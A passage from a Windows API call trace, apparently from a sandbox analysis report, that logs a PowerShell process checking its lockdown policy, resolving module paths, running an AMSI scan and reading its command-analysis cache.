(dwNewMode=0x1, lpOldMode=0xb156f8c7c0) returned 1 [0171.240] CoTaskMemAlloc (cb=0x20c) returned 0x1e3514514b0 [0171.240] GetSystemDirectoryW (in: lpBuffer=0x1e3514514b0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0171.241] CoTaskMemFree (pv=0x1e3514514b0) [0171.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0xb156f8c340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0171.241] WldpGetLockdownPolicy () returned 0x0 [0171.241] GetSystemInfo (in: lpSystemInfo=0xb156f8c8d0 | out: lpSystemInfo=0xb156f8c8d0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0171.241] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8c7d8 | out: phkResult=0xb156f8c7d8*=0x9bc) returned 0x0 [0171.242] RegQueryValueExW (in: hKey=0x9bc, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0xb156f8c828, lpData=0x0, lpcbData=0xb156f8c820*=0x0 | out: lpType=0xb156f8c828*=0x0, lpData=0x0, lpcbData=0xb156f8c820*=0x0) returned 0x2 [0171.242] RegCloseKey (hKey=0x9bc) returned 0x0 [0171.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0xb156f8c1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0171.245] CoTaskMemAlloc (cb=0x20c) returned 0x1e35144ff70 [0171.245] GetSystemDirectoryW (in: lpBuffer=0x1e35144ff70, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0171.245] CoTaskMemFree (pv=0x1e35144ff70) [0171.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0xb156f8c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0171.245] WldpGetLockdownPolicy () returned 0x0 [0171.245] GetSystemInfo (in: lpSystemInfo=0xb156f8c730 | out: lpSystemInfo=0xb156f8c730*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0171.246] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8c638 | out: phkResult=0xb156f8c638*=0x9c0) returned 0x0 [0171.246] RegQueryValueExW (in: hKey=0x9c0, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0xb156f8c688, lpData=0x0, lpcbData=0xb156f8c680*=0x0 | out: lpType=0xb156f8c688*=0x0, lpData=0x0, lpcbData=0xb156f8c680*=0x0) returned 0x2 [0171.246] RegCloseKey (hKey=0x9c0) returned 0x0 [0171.246] CloseHandle (hObject=0x9bc) returned 1 [0171.247] CoCreateGuid (in: pguid=0xb156f8c7e8 | out: pguid=0xb156f8c7e8*(Data1=0x6cb6104d, Data2=0xbdfb, Data3=0x4f90, Data4=([0]=0x81, [1]=0x47, [2]=0xf2, [3]=0x3d, [4]=0x4b, [5]=0xe5, [6]=0x8b, [7]=0x90))) returned 0x0 [0171.247] AmsiOpenSession () returned 0x0 [0171.247] AmsiScanString () returned 0x80070015 [0171.261] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\en-US\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\en-us\\microsoft.powershell.management.psd1")) returned 0xffffffff [0171.261] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\en\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\en\\microsoft.powershell.management.psd1")) returned 0xffffffff [0171.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0xb156f8b3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0171.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x105, lpBuffer=0xb156f8b370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0171.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\PSGetModuleInfo.xml", nBufferLength=0x105, lpBuffer=0xb156f8b3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x66 [0171.270] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0xb156f8b8e0 | out: lpFileInformation=0xb156f8b8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0171.270] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.commands.management.dll")) returned 0xffffffff [0171.270] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Commands.Management.dll\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.commands.management.dll\\microsoft.powershell.commands.management.dll")) returned 0xffffffff [0171.270] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144fb30 [0171.270] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1e35144fb30, nSize=0x105 | out: lpBuffer="") returned 0x97 [0171.270] CoTaskMemFree (pv=0x1e35144fb30) [0171.271] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8b170, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0171.271] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8b6a0 | out: lpFileInformation=0xb156f8b6a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0171.273] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0171.286] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8b170, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0171.286] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8b5c0) returned 1 [0171.286] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8b6a0 | out: lpFileInformation=0xb156f8b6a0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0171.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8b580) returned 1 [0171.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8b170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0171.287] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8b5c0) returned 1 [0171.287] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8b6a0 | out: lpFileInformation=0xb156f8b6a0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0171.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8b580) returned 1 [0171.287] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management", nBufferLength=0x105, lpBuffer=0xb156f8afd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management", lpFilePart=0x0) returned 0x53 [0171.287] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8b420) returned 1 [0171.287] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.management"), fInfoLevelId=0x0, lpFileInformation=0xb156f8b500 | out: lpFileInformation=0xb156f8b500*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0171.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8b3e0) returned 1 [0171.289] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.management\\microsoft.powershell.commands.management.dll")) returned 0xffffffff [0171.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management", nBufferLength=0x105, lpBuffer=0xb156f8afd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management", lpFilePart=0x0) returned 0x5b [0171.289] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8b420) returned 1 [0171.289] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.management"), fInfoLevelId=0x0, lpFileInformation=0xb156f8b500 | out: lpFileInformation=0xb156f8b500*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0171.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8b3e0) returned 1 [0171.292] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.management\\microsoft.powershell.commands.management.dll")) returned 0xffffffff [0171.296] CoTaskMemAlloc (cb=0x20c) returned 0x1e35144d2d0 [0171.296] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1e35144d2d0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0171.296] CoTaskMemFree (pv=0x1e35144d2d0) [0171.296] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xb156f8c330, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0171.296] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144cc70 [0171.296] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1e35144cc70, nSize=0x105 | out: lpBuffer="") returned 0x0 [0171.296] CoTaskMemFree (pv=0x1e35144cc70) [0171.296] CoTaskMemAlloc (cb=0x20c) returned 0x1e35144d710 [0171.296] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1e35144d710 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0171.296] CoTaskMemFree (pv=0x1e35144d710) [0171.296] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xb156f8c290, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0171.296] GetCurrentProcess () returned 0xffffffffffffffff [0171.296] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8c748 | out: TokenHandle=0xb156f8c748*=0x9bc) returned 1 [0171.297] GetTokenInformation (in: TokenHandle=0x9bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xb156f8c848 | out: TokenInformation=0x0, ReturnLength=0xb156f8c848) returned 0 [0171.297] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1e3513d6010 [0171.297] GetTokenInformation (in: TokenHandle=0x9bc, TokenInformationClass=0x1, TokenInformation=0x1e3513d6010, TokenInformationLength=0x2c, ReturnLength=0xb156f8c848 | out: TokenInformation=0x1e3513d6010, ReturnLength=0xb156f8c848) returned 1 [0171.297] LocalFree (hMem=0x1e3513d6010) returned 0x0 [0171.298] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x1e339a02280, cbSid=0xb156f8c840 | out: pSid=0x1e339a02280*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0xb156f8c840) returned 1 [0171.298] CreateMutexW (lpMutexAttributes=0x1e339a023d0, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x9c0 [0171.298] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xb156f8c6e0*=0x9c0, lpdwindex=0xb156f8c4b4 | out: lpdwindex=0xb156f8c4b4) returned 0x0 [0171.299] CoTaskMemAlloc (cb=0x20e) returned 0x1e351452170 [0171.299] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1e351452170, nSize=0x105 | out: lpBuffer="") returned 0x0 [0171.299] CoTaskMemFree (pv=0x1e351452170) [0171.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0xb156f8c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0171.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c830) returned 1 [0171.299] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1e339a02a78 | out: lpFileInformation=0x1e339a02a78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955)) returned 1 [0171.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c7f0) returned 1 [0171.299] ReleaseMutex (hMutex=0x9c0) returned 1 [0171.299] GetCurrentProcess () returned 0xffffffffffffffff [0171.300] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8c878 | out: TokenHandle=0xb156f8c878*=0x9c4) returned 1 [0171.300] GetTokenInformation (in: TokenHandle=0x9c4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xb156f8c978 | out: TokenInformation=0x0, ReturnLength=0xb156f8c978) returned 0 [0171.300] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1e3513d64d0 [0171.300] GetTokenInformation (in: TokenHandle=0x9c4, TokenInformationClass=0x1, TokenInformation=0x1e3513d64d0, TokenInformationLength=0x2c, ReturnLength=0xb156f8c978 | out: TokenInformation=0x1e3513d64d0, ReturnLength=0xb156f8c978) returned 1 [0171.300] LocalFree (hMem=0x1e3513d64d0) returned 0x0 [0171.301] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x1e339a03710, cbSid=0xb156f8c970 | out: pSid=0x1e339a03710*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0xb156f8c970) returned 1 [0171.301] CreateMutexW (lpMutexAttributes=0x1e339a03860, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x9c8 [0171.301] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xb156f8c810*=0x9c8, lpdwindex=0xb156f8c5e4 | out: lpdwindex=0xb156f8c5e4) returned 0x0 [0171.302] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144f2b0 [0171.302] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1e35144f2b0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0171.302] CoTaskMemFree (pv=0x1e35144f2b0) [0171.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0xb156f8c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0171.302] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c8a0) returned 1 [0171.302] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1e339a20b20 | out: lpFileInformation=0x1e339a20b20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955)) returned 1 [0171.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c860) returned 1 [0171.303] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0xb156f8c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0171.303] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c720) returned 1 [0171.303] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0xb156f8c800 | out: lpFileInformation=0xb156f8c800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6aa912f0, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0x6aa912f0, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0171.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0171.303] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0xb156f8c180, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0171.303] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c660) returned 1 [0171.303] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x9cc [0171.304] GetFileType (hFile=0x9cc) returned 0x1 [0171.304] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c5d0) returned 1 [0171.304] GetFileType (hFile=0x9cc) returned 0x1 [0171.304] ReadFile (in: hFile=0x9cc, lpBuffer=0x1e339a22170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c4c8, lpOverlapped=0x0 | out: lpBuffer=0x1e339a22170*, lpNumberOfBytesRead=0xb156f8c4c8*=0x1000, lpOverlapped=0x0) returned 1 [0171.308] ReadFile (in: hFile=0x9cc, lpBuffer=0x1e339a23f43, nNumberOfBytesToRead=0x28, lpNumberOfBytesRead=0xb156f8c168, lpOverlapped=0x0 | out: lpBuffer=0x1e339a23f43*, lpNumberOfBytesRead=0xb156f8c168*=0x28, lpOverlapped=0x0) returned 1 [0171.308] ReadFile (in: hFile=0x9cc, lpBuffer=0x1e339a22170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c138, lpOverlapped=0x0 | out: lpBuffer=0x1e339a22170*, lpNumberOfBytesRead=0xb156f8c138*=0x1000, lpOverlapped=0x0) returned 1 [0171.311] ReadFile (in: hFile=0x9cc, lpBuffer=0x1e339a23f6f, nNumberOfBytesToRead=0x14, lpNumberOfBytesRead=0xb156f8c168, lpOverlapped=0x0 | out: lpBuffer=0x1e339a23f6f*, lpNumberOfBytesRead=0xb156f8c168*=0x14, lpOverlapped=0x0) returned 1 [0171.311] ReadFile (in: hFile=0x9cc, lpBuffer=0x1e339a22170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c138, lpOverlapped=0x0 | out: lpBuffer=0x1e339a22170*, lpNumberOfBytesRead=0xb156f8c138*=0x1000, lpOverlapped=0x0) returned 1 [0171.313] ReadFile (in: hFile=0x9cc, lpBuffer=0x1e339a23f32, nNumberOfBytesToRead=0x2f, lpNumberOfBytesRead=0xb156f8c168, lpOverlapped=0x0 | out: lpBuffer=0x1e339a23f32*, lpNumberOfBytesRead=0xb156f8c168*=0x2f, lpOverlapped=0x0) returned 1 [0171.313] ReadFile (in: hFile=0x9cc, lpBuffer=0x1e339a22170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c138, lpOverlapped=0x0 | out: lpBuffer=0x1e339a22170*, lpNumberOfBytesRead=0xb156f8c138*=0x1000, lpOverlapped=0x0) returned 1 [0171.315] ReadFile (in: hFile=0x9cc, lpBuffer=0x1e339a23ef8, nNumberOfBytesToRead=0x17, lpNumberOfBytesRead=0xb156f8c0f8, lpOverlapped=0x0 | out: lpBuffer=0x1e339a23ef8*, lpNumberOfBytesRead=0xb156f8c0f8*=0x17, lpOverlapped=0x0) returned 1 [0171.315] ReadFile (in: hFile=0x9cc, lpBuffer=0x1e339a22170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c198, lpOverlapped=0x0 | out: lpBuffer=0x1e339a22170*, lpNumberOfBytesRead=0xb156f8c198*=0xd58, lpOverlapped=0x0) returned 1 [0171.324] ReadFile (in: hFile=0x9cc, lpBuffer=0x1e339a22170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c498, lpOverlapped=0x0 | out: lpBuffer=0x1e339a22170*, lpNumberOfBytesRead=0xb156f8c498*=0x0, lpOverlapped=0x0) returned 1 [0171.324] CloseHandle (hObject=0x9cc) returned 1 [0171.324] 